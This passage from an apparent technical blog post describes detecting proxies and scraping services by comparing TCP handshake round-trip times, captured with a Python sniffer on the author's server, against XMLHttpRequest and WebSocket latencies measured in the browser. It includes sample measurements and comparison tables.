<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">):</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'SYN'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">label</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">):</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'ACK'</span>
<span class="k">if</span> <span class="s1">'SYN+ACK'</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="s1">'ACK'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_SYN</span><span class="p">)</span> <span class="ow">and</span> <span class="p">(</span><span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span> <span class="o">&</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TH_ACK</span><span class="p">):</span>
<span class="n">key</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">:</span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">dst_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">dport</span><span class="p">)</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">'SYN+ACK'</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">rtts</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">label</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="n">label</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">rtts</span> <span class="ow">and</span> <span class="s2">"SYN+ACK"</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="s2">"ACK"</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="ow">and</span> <span class="ow">not</span> <span class="s1">'RTT'</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">ms'</span> <span class="o">%</span> <span class="nb">round</span><span class="p">(((</span><span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"ACK"</span><span class="p">]</span> <span class="o">-</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"SYN+ACK"</span><span class="p">])</span> <span class="o">*</span> <span class="mi">1000</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT2'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">round</span><span class="p">(</span><span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"ACK"</span><span class="p">]</span> <span class="o">-</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s2">"SYN+ACK"</span><span class="p">],</span> <span class="mi">4</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"TCP Handshake - </span><span class="si">%s</span><span class="s2">:</span><span class="si">%s</span><span class="s2"> -> </span><span class="si">%s</span><span class="s2">:</span><span class="si">%s</span><span class="s2"> [</span><span class="si">%s</span><span class="s2">], RTT=</span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">src_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">sport</span><span class="p">,</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">dst_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">dport</span><span class="p">,</span> <span class="n">label</span><span class="p">,</span> <span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">][</span><span class="s1">'RTT'</span><span class="p">]))</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)</span> <span class="o">%</span> <span class="mi">13</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">updateFile</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">usage</span><span class="p">():</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"""</span>
<span class="s2"> -i, --interface interface to listen to; example: -i eth0</span>
<span class="s2"> -l, --log log file to write output to; example -l output.txt (not implemented yet)</span>
<span class="s2"> -v, --verbose verbose logging, mostly just telling you where/what we're doing, not recommended if want to parse output typically"""</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">logger</span> <span class="o">=</span> <span class="n">pypacker</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">getLogger</span><span class="p">(</span><span class="s2">"pypacker"</span><span class="p">)</span>
<span class="n">pypacker</span><span class="o">.</span><span class="n">logger</span><span class="o">.</span><span class="n">setLevel</span><span class="p">(</span><span class="n">pypacker</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">ERROR</span><span class="p">)</span>
<span class="n">counter</span> <span class="o">=</span> <span class="mi">0</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'listening on interface </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">interface</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">preader</span> <span class="o">=</span> <span class="n">pcapy</span><span class="o">.</span><span class="n">open_live</span><span class="p">(</span><span class="n">interface</span><span class="p">,</span> <span class="mi">65536</span><span class="p">,</span> <span class="kc">False</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">preader</span><span class="o">.</span><span class="n">setfilter</span><span class="p">(</span><span class="s1">'tcp port 80 or tcp port 443'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">counter</span> <span class="o">=</span> <span class="n">counter</span> <span class="o">+</span> <span class="mi">1</span>
<span class="p">(</span><span class="n">header</span><span class="p">,</span> <span class="n">buf</span><span class="p">)</span> <span class="o">=</span> <span class="n">preader</span><span class="o">.</span><span class="n">next</span><span class="p">()</span>
<span class="n">ts</span> <span class="o">=</span> <span class="n">header</span><span class="o">.</span><span class="n">getts</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">layer</span> <span class="o">=</span> <span class="kc">None</span>
<span class="c1"># try to determine what type of packets we have, there is the chance that 0x800</span>
<span class="c1"># may be in the spot we're checking, may want to add better testing in future</span>
<span class="n">eth</span> <span class="o">=</span> <span class="n">ethernet</span><span class="o">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">hex</span><span class="p">(</span><span class="n">eth</span><span class="o">.</span><span class="n">type</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'0x800'</span><span class="p">:</span>
<span class="n">layer</span> <span class="o">=</span> <span class="s1">'eth'</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="n">eth</span>
<span class="k">if</span> <span class="p">(</span><span class="n">eth</span><span class="p">[</span><span class="n">ethernet</span><span class="o">.</span><span class="n">Ethernet</span><span class="p">,</span> <span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">,</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">):</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">lcc</span> <span class="o">=</span> <span class="n">linuxcc</span><span class="o">.</span><span class="n">LinuxCC</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">hex</span><span class="p">(</span><span class="n">lcc</span><span class="o">.</span><span class="n">type</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'0x800'</span><span class="p">:</span>
<span class="n">layer</span> <span class="o">=</span> <span class="s1">'lcc'</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="n">lcc</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lcc</span><span class="p">[</span><span class="n">linuxcc</span><span class="o">.</span><span class="n">LinuxCC</span><span class="p">,</span> <span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">,</span> <span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">):</span>
<span class="n">tcpPacket</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">tcpPacket</span> <span class="ow">and</span> <span class="n">pkt</span> <span class="ow">and</span> <span class="n">layer</span><span class="p">:</span>
<span class="n">tcpProcess</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">layer</span><span class="p">,</span> <span class="n">ts</span><span class="p">)</span>
<span class="k">except</span> <span class="p">(</span><span class="ne">KeyboardInterrupt</span><span class="p">,</span> <span class="ne">SystemExit</span><span class="p">):</span>
<span class="k">raise</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="n">error_string</span> <span class="o">=</span> <span class="n">traceback</span><span class="o">.</span><span class="n">format_exc</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">error_string</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">opts</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">getopt</span><span class="o">.</span><span class="n">getopt</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">:],</span> <span class="s2">"i:vc:"</span><span class="p">,</span> <span class="p">[</span><span class="s1">'interface='</span><span class="p">,</span> <span class="s1">'verbose'</span><span class="p">])</span>
<span class="n">proceed</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">opt</span><span class="p">,</span> <span class="n">val</span> <span class="ow">in</span> <span class="n">opts</span><span class="p">:</span>
<span class="k">if</span> <span class="n">opt</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'-i'</span><span class="p">,</span> <span class="s1">'--interface'</span><span class="p">):</span>
<span class="n">interface</span> <span class="o">=</span> <span class="n">val</span>
<span class="n">proceed</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">opt</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'-v'</span><span class="p">,</span> <span class="s1">'--verbose'</span><span class="p">):</span>
<span class="n">verbose</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="p">(</span><span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">)</span> <span class="ow">and</span> <span class="n">proceed</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Need to provide a pcap to read in or an interface to watch'</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">usage</span><span class="p">()</span>
<span class="k">except</span> <span class="n">getopt</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="n">usage</span><span class="p">()</span>
</code></pre></div>
<p>Save the above script on your server as <code>lat.py</code> and run it with:</p>
<div class="highlight"><pre><span></span><code>python lat.py -i eth0
</code></pre></div>
<p>My RTT measurement tool will produce output as listed below. The sample was taken from someone from South America visiting my blog:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65238</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">231.72</span><span class="nx">ms</span>
<span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65237</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">239.88</span><span class="nx">ms</span>
<span class="mf">1623092439</span><span class="o">:</span> <span class="mf">192.123.255.204</span><span class="o">:</span><span class="mf">65240</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">239.9</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
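<p>The core bookkeeping of the script can be sketched without <code>pcapy</code> or <code>pypacker</code>. This is only a simplified illustration: the function name <code>handshake_rtts</code>, the event tuples and the example IP addresses are hypothetical, and timestamps are passed in instead of being taken with <code>time.time()</code>.</p>

```python
# Simplified, library-free sketch of the SYN+ACK -> ACK bookkeeping.
# The event tuples and the function name are hypothetical, for illustration only.

TH_SYN = 0x02  # TCP SYN flag bit
TH_ACK = 0x10  # TCP ACK flag bit


def handshake_rtts(events):
    """Return {client 'ip:port': RTT in ms} from (ts, src, sport, dst, dport, flags) tuples.

    The RTT is the time between the server's SYN+ACK and the client's first ACK.
    """
    seen = {}  # client key -> timestamps of handshake packets
    rtts = {}
    for ts, src, sport, dst, dport, flags in events:
        syn = bool(flags & TH_SYN)
        ack = bool(flags & TH_ACK)
        if syn and not ack:
            # client -> server SYN: start tracking this connection
            seen.setdefault(f"{src}:{sport}", {})
        elif syn and ack:
            # server -> client SYN+ACK: the client is the destination
            key = f"{dst}:{dport}"
            if key in seen and "SYN+ACK" not in seen[key]:
                seen[key]["SYN+ACK"] = ts
        elif ack:
            # client -> server ACK: only the first one after the SYN+ACK counts
            key = f"{src}:{sport}"
            if key in seen and "SYN+ACK" in seen[key] and key not in rtts:
                rtts[key] = round((ts - seen[key]["SYN+ACK"]) * 1000, 2)
    return rtts


# Made-up handshake using documentation IP ranges, timestamps in seconds.
events = [
    (100.000, "203.0.113.7", 50000, "198.51.100.1", 443, TH_SYN),
    (100.001, "198.51.100.1", 443, "203.0.113.7", 50000, TH_SYN | TH_ACK),
    (100.041, "203.0.113.7", 50000, "198.51.100.1", 443, TH_ACK),
    (100.300, "203.0.113.7", 50000, "198.51.100.1", 443, TH_ACK),  # later ACK, ignored
]
print(handshake_rtts(events))
```

<p>Keying by the client's <code>ip:port</code> pair means that each new connection from the same visitor yields its own RTT sample.</p>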
<h2>Testing the XMLHttpRequest Latency Technique</h2>
<p>I will visit the following detection test site: <a href="https://bot.incolumitas.com/latency.html">https://bot.incolumitas.com/latency.html</a> twice:</p>
<ol>
<li>Once with my normal browser without any proxy</li>
<li>The second time with a scraping service that uses a proxy</li>
</ol>
<p>On the server side, I will keep my TCP/IP latency measurement tool running.</p>
<p>First, I will test latencies with my own browser without using any proxy.</p>
<p>Latencies recorded from the TCP/IP handshake:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623144210</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33724</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.79</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33726</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">23.87</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33728</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.82</span><span class="nx">ms</span>
<span class="mf">1623144211</span><span class="o">:</span> <span class="mf">84.151.230.146</span><span class="o">:</span><span class="mf">33732</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">15.53</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
<p>Latencies recorded from the browser with JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"median"</span><span class="o">:</span> <span class="mf">136.4</span><span class="p">,</span>
<span class="s2">"measurements"</span><span class="o">:</span> <span class="p">[</span><span class="mf">109.9</span><span class="p">,</span> <span class="mf">116.2</span><span class="p">,</span> <span class="mf">124.8</span><span class="p">,</span> <span class="mf">134.4</span><span class="p">,</span> <span class="mf">134.6</span><span class="p">,</span> <span class="mf">136.4</span><span class="p">,</span> <span class="mf">165</span><span class="p">,</span> <span class="mf">175</span><span class="p">,</span> <span class="mf">181.5</span><span class="p">,</span> <span class="mf">190.5</span><span class="p">,</span> <span class="mf">196</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<p>And now I will visit my <a href="https://bot.incolumitas.com/latency.html">test site</a> with a scraping service.</p>
<p>Latencies recorded from the TCP/IP handshake:</p>
<div class="highlight"><pre><span></span><code><span class="mf">1623144996</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">56938</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">127.85</span><span class="nx">ms</span>
<span class="mf">1623144997</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">55420</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">183.9</span><span class="nx">ms</span>
<span class="mf">1623144997</span><span class="o">:</span> <span class="mf">24.125.86.142</span><span class="o">:</span><span class="mf">47526</span> <span class="o">-></span> <span class="mf">167.99.241.135</span><span class="o">:</span><span class="mf">443</span> <span class="p">[</span><span class="nx">ACK</span><span class="p">],</span> <span class="nx">RTT</span><span class="o">=</span><span class="mf">136.08</span><span class="nx">ms</span>
<span class="p">...</span>
</code></pre></div>
<p>Latencies recorded from the browser with JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"median"</span><span class="o">:</span> <span class="mf">1147.83</span><span class="p">,</span>
<span class="s2">"measurements"</span><span class="o">:</span> <span class="p">[</span><span class="mf">871.23</span><span class="p">,</span> <span class="mf">977.15</span><span class="p">,</span> <span class="mf">979.31</span><span class="p">,</span> <span class="mf">1012.47</span><span class="p">,</span> <span class="mf">1034.18</span><span class="p">,</span> <span class="mf">1147.83</span><span class="p">,</span> <span class="mf">1190.57</span><span class="p">,</span> <span class="mf">1229.74</span><span class="p">,</span> <span class="mf">1276.93</span><span class="p">,</span> <span class="mf">1287.49</span><span class="p">,</span> <span class="mf">1318.97</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<p>Those are the results when considering the median values:</p>
<table>
<thead>
<tr>
<th>RTT TCP Handshake (ms)</th>
<th>RTT XMLHttpRequest (ms)</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>23</td>
<td>136</td>
<td>No</td>
</tr>
<tr>
<td>125</td>
<td>1034</td>
<td>Yes</td>
</tr>
</tbody>
</table>
<p>Those are definitely not enough samples. I needed to record real-world samples from people all over the world
running the <code>XMLHttpRequest</code> technique script.</p>
<p>After having collected enough samples from real-world users visiting my website, I can definitely say that the <code>XMLHttpRequest</code> technique to measure latencies is way too inaccurate. Therefore, the test site <a href="https://bot.incolumitas.com/latency.html">https://bot.incolumitas.com/latency.html</a> is not usable to detect tunnels such as proxies or VPNs.</p>
<p>Reason: Modern browsers simply add too much unpredictable stalling and delay to <code>XMLHttpRequest</code> requests. Therefore, it's impossible to compare those samples to RTTs measured in the TCP/IP handshake.</p>
<h2>Testing the WebSocket Latency Technique</h2>
<p>The data collection method was as follows: I let the TCP/IP handshake Python script from above run on my server. At the same time, I record the latency of five WebSocket messages with the <code>WebSocket</code> technique from above. Then I compare the median of the five WebSocket latency measurements with the median of the TCP/IP handshake latencies.</p>
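<p>A minimal sketch of this comparison in Python. The measurement values are hypothetical, and the formula (absolute difference divided by the TCP handshake RTT) is an assumption about how the percentage difference is computed.</p>

```python
from statistics import median


def relative_difference(tcp_rtt_ms, websocket_rtt_ms):
    """Percentage by which the WebSocket RTT deviates from the TCP handshake RTT.

    Assumption: the difference is taken relative to the TCP handshake RTT.
    """
    return abs(websocket_rtt_ms - tcp_rtt_ms) / tcp_rtt_ms * 100


# Hypothetical measurements for one visitor, in milliseconds.
tcp_handshake_rtts = [79.1, 79.83, 81.4]
websocket_rtts = [84.0, 85.2, 86.0, 88.9, 140.3]  # the last value is an outlier

# The median keeps a single outlier from skewing the result.
tcp_median = median(tcp_handshake_rtts)
ws_median = median(websocket_rtts)

print(round(relative_difference(tcp_median, ws_median), 1))
```

<p>Taking the median instead of the mean keeps a single retransmitted message from dominating the comparison.</p>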
<p>Below are the latency samples from 11 (probably) real people visiting my website on a Sunday afternoon:</p>
<table>
<thead>
<tr>
<th>RTT TCP Handshake</th>
<th>RTT WebSocket</th>
<th>Difference in %</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>79.83ms</td>
<td>86ms</td>
<td>7.7%</td>
<td>No</td>
</tr>
<tr>
<td>191ms</td>
<td>189ms</td>
<td>1.05%</td>
<td>No</td>
</tr>
<tr>
<td>175.8ms</td>
<td>178ms</td>
<td>1.2%</td>
<td>No</td>
</tr>
<tr>
<td>239.7ms</td>
<td>237ms</td>
<td>1.1%</td>
<td>No</td>
</tr>
<tr>
<td>40.1ms</td>
<td>41ms</td>
<td>2.2%</td>
<td>No</td>
</tr>
<tr>
<td>135.9ms</td>
<td>134.9ms</td>
<td>0.7%</td>
<td>No</td>
</tr>
<tr>
<td>116.0ms</td>
<td>104ms</td>
<td>11.5%</td>
<td>No</td>
</tr>
<tr>
<td>47ms</td>
<td>48ms</td>
<td>2.1%</td>
<td>No</td>
</tr>
<tr>
<td>135.9ms</td>
<td>133ms</td>
<td>2.1%</td>
<td>No</td>
</tr>
<tr>
<td>64ms</td>
<td>62ms</td>
<td>3.2%</td>
<td>No</td>
</tr>
<tr>
<td>207.9ms</td>
<td>236.7ms</td>
<td>13.8%</td>
<td>No</td>
</tr>
</tbody>
</table>
<p>As you can see, the difference between WebSocket latency and TCP/IP handshake is in most cases marginal. I assume that those visitors didn't use any proxy.</p>
<p>Obviously, I cannot say for sure, because after all, I want to find a way to detect proxy usage. But I am quite confident that they don't use proxies, because their browsing behavior appears to be organic and most of my visitors don't use proxies (except on <a href="https://bot.incolumitas.com/">bot.incolumitas.com</a>).</p>
<p>Now it's time to collect samples from some scraping providers (such as <a href="https://brightdata.com/">Brightdata</a> or <a href="https://www.scrapingbee.com/">ScrapingBee</a>) and see how the latencies differ there. With those providers, I am very confident that they use proxies, so my hypothesis is the following: The latencies from the WebSocket messages should be significantly larger than the ones from the TCP handshake.</p>
<table>
<thead>
<tr>
<th>Proxy Provider</th>
<th>RTT TCP Handshake</th>
<th>RTT WebSocket</th>
<th>Difference in %</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>Brightdata</td>
<td>135.8ms</td>
<td>231ms</td>
<td>70%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>122.3ms</td>
<td>228ms</td>
<td>86%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>103.9ms</td>
<td>210ms</td>
<td>102%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>151.1ms</td>
<td>224ms</td>
<td>48%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>128ms</td>
<td>198ms</td>
<td>54%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>121.85ms</td>
<td>240ms</td>
<td>96%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>191.9ms</td>
<td>278.7ms</td>
<td>45%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>143.7ms</td>
<td>291ms</td>
<td>103%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>149.9ms</td>
<td>354.4ms</td>
<td>136%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>95.7ms</td>
<td>174.3ms</td>
<td>83%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>147.9ms</td>
<td>293.3ms</td>
<td>98%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>95.7ms</td>
<td>177.3ms</td>
<td>86%</td>
<td>Yes</td>
</tr>
</tbody>
</table>
<p>The samples above confirm my hypothesis.</p>
<p>Indeed, the WebSocket latencies are between 45% and 136% larger than their corresponding TCP handshake latencies. That is a significant difference compared to the largest difference of the <em>No Proxy</em> measurements from above (13.6%). Statistically speaking, we can determine with high probability whether the visiting user is using a proxy or not. Mission accomplished!</p>
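<p>To make the comparison concrete, here is a minimal sketch of how such a check could look. The function names and the 30% threshold are my own assumptions for illustration. The threshold simply sits in the gap between the <em>No Proxy</em> and the proxy samples above and is not a tuned value.</p>

```javascript
// Median of a list of RTT samples in milliseconds.
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1
    ? sorted[mid]
    : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Relative difference between the WebSocket RTT and the TCP handshake RTT.
// A value of 0.70 means that the WebSocket RTT is 70% larger.
function rttDifference(tcpRtts, wsRtts) {
  const tcp = median(tcpRtts);
  const ws = median(wsRtts);
  return (ws - tcp) / tcp;
}

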